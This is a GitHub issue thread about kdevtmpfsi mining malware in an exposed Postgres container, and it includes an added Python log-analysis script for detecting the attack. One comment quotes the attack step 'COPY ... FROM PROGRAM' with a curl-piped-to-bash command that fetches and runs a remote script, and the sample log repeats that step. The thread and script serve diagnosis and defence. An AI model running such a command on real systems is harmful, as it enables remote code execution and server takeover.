docker-library / postgres

Docker Official Image packaging for Postgres
http://www.postgresql.org
MIT License
2.16k stars 1.13k forks

kdevtmpfsi malware found in postgres latest image #1054

Closed cottons-kr closed 1 year ago

cottons-kr commented 1 year ago

I noticed that /tmp/kdevtmpfsi is using all CPU resources, so I tried to remove it, but it was in /var/lib/docker/overlay2/.../.../merged. I stopped the PostgreSQL container because it was the only running container on the server.

wglambert commented 1 year ago

This is an unfortunate consequence of having a public-facing instance with a compromised (or simple) password. https://github.com/docker-library/postgres/issues/817#issuecomment-781482631 https://github.com/docker-library/postgres/issues/798#issuecomment-747610025

See also: https://github.com/docker-library/redis/issues/217 https://github.com/docker-library/redis/issues/225 https://github.com/docker-library/php/issues/1110 https://github.com/docker-library/php/issues/1127

zedefi commented 8 months ago

I wonder how someone is able to install mining malware if they can only access your database via the psql console?

ImreSamu commented 8 months ago

@zedefi :

> I wonder how someone is able to install mining malware if they can only access your database via the psql console?

Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
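Added example, not part of the thread or of the docker-library project: a log check for the sequence described above (repeated failed logins from one host, then `COPY ... FROM PROGRAM`). It assumes `log_line_prefix = '%m [%p] '`, `log_connections = on` and `log_statement = 'mod'` or `'all'`; the log lines, addresses and table names are constructed.

```python
import re
from collections import defaultdict

# Constructed sample log, not taken from the thread. Assumed settings:
# log_line_prefix = '%m [%p] ', log_connections = on, log_statement = 'mod'.
# The COPY line reuses the masked command quoted above; the table name is made up.
SAMPLE_LOG = """\
2024-05-01 03:10:01.100 UTC [201] LOG:  connection received: host=203.0.113.7 port=41000
2024-05-01 03:10:01.150 UTC [201] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:02.100 UTC [202] LOG:  connection received: host=203.0.113.7 port=41002
2024-05-01 03:10:02.150 UTC [202] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:03.100 UTC [203] LOG:  connection received: host=203.0.113.7 port=41004
2024-05-01 03:10:03.150 UTC [203] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:04.100 UTC [204] LOG:  connection received: host=203.0.113.7 port=41006
2024-05-01 03:10:04.150 UTC [204] LOG:  connection authorized: user=postgres database=postgres
2024-05-01 03:10:05.000 UTC [204] LOG:  statement: COPY t FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
2024-05-01 09:00:00.000 UTC [310] LOG:  connection received: host=198.51.100.9 port=50000
2024-05-01 09:00:00.050 UTC [310] FATAL:  password authentication failed for user "app"
2024-05-01 09:00:05.000 UTC [311] LOG:  connection received: host=198.51.100.9 port=50002
2024-05-01 09:00:06.000 UTC [311] LOG:  statement: COPY orders FROM '/import/orders.csv' WITH (FORMAT csv);
"""

LINE = re.compile(r"^\S+ \S+ \S+ \[(?P<pid>\d+)\] [A-Z]+:\s+(?P<msg>.*)$")
CONNECT = re.compile(r"connection received: host=(\S+)")
AUTH_FAIL = re.compile(r'password authentication failed for user "[^"]+"')
# COPY with PROGRAM runs a shell command as the server's OS user; plain file COPY does not match.
COPY_PROGRAM = re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.IGNORECASE)

def analyze(log_text, fail_threshold=3):
    """Return ({host: failed_logins >= threshold}, [(host, COPY ... PROGRAM statement)])."""
    host_by_pid, failures, copies = {}, defaultdict(int), []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # e.g. continuation lines of a multi-line statement
        pid, msg = m["pid"], m["msg"]
        if (c := CONNECT.search(msg)):
            host_by_pid[pid] = c.group(1)  # backend PID -> client host
        elif AUTH_FAIL.search(msg):
            failures[host_by_pid.get(pid, "unknown")] += 1
        elif msg.startswith("statement:") and COPY_PROGRAM.search(msg):
            copies.append((host_by_pid.get(pid, "unknown"), msg.split(":", 1)[1].strip()))
    brute = {h: n for h, n in failures.items() if n >= fail_threshold}
    return brute, copies

if __name__ == "__main__":
    brute, copies = analyze(SAMPLE_LOG)
    print("hosts with repeated failed logins:", brute)
    print("COPY ... PROGRAM statements:", copies)
```

A host that appears in both results matches the brute force followed by command execution pattern from the comment above.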

codingwizardx commented 5 months ago

> Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';

Well said @ImreSamu. Yes, that's actually true; I faced the same issue because of exposing database ports to the internet.

tirzasrwn commented 2 months ago

I have the same issue because of having a weak password. Changing the password to a strong one works for me.

paulkorir commented 1 month ago

One thing I found useful was to sudo -u postgres crontab -e where I found the cronjob that kept restarting it. After deleting that it seems to have quietened down. Fingers crossed!